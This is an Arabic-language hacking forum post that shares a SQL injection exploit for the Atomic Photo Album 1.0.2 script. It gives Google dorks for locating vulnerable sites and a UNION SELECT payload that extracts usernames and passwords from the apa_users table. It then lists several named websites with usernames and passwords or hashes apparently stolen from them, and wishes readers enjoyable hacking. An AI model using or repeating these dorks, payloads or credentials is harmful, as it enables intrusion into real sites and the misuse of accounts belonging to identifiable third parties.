[ThE JoCkEy]

سلام شباب

وجدت في مواقع السكرتي ثغرة جميلة للحقن ... و تم استخراج الاستغلال الذي يعمل مع جميع المواقع ذات نفس السكريبت

Atomic Photo Album 1.0.2 هدا هو السكريبت المصاب

photo_album.php هدا هو الملف الدي يحتوي الثغرة

و هدا هو الدورك الطازج
[~] Dork: "Powered by Atomic Photo Album"
او
inurl:"photo.php?apa_album_ID="
و تفضلوا الاستغلال شباب
photo.php?apa_album_ID=2&apa_photo_ID=-24+union+select+1,concat(nickname,0x3a,password),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +apa_users

كل المواقع تحتوي على 20 عمود و 2 هو العمود المصاب

. في النهايو تفضلوا هديتي المتواضعة

http://www.mcny.edu/news/newsdetail....b.alumni_users
user:tgeorgiou
pass:8a9ade8904a3473af280ee4f2a286e80
-----------------------
http://www.brzi.info/foto/photo.php?...from+apa_users
user:foto
pass:foto
-----------------------
http://www.fokoinusa.com.ar/album/ph...from+apa_users
user:admin
pass:156fl52w
-----------------------
http://www.ftu.se/foto/photo.php?apa...from+apa_users
user:jansu
pass:Anwiscja
-----------------------
http://djreal.net/photo_album/photo....from+apa_users
user:Real
pass:wds34rd
-----------------------


انتمني لكم يوم جميل في حماية الله و اختراقات ممتعة
و السلام عليكم